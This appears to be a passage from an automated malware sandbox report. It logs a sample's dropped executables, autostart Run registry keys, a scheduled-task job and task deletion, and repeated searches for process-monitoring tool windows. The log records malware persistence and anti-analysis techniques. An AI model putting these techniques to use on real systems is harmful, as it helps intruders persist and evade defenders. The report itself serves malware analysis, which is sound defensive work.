Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1032619001\rsn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1032622001\Dd7mHw1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1032645001\artVssK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\D95Ju8g[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1759c0aff4.exe			Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1759c0aff4.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1759c0aff4.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
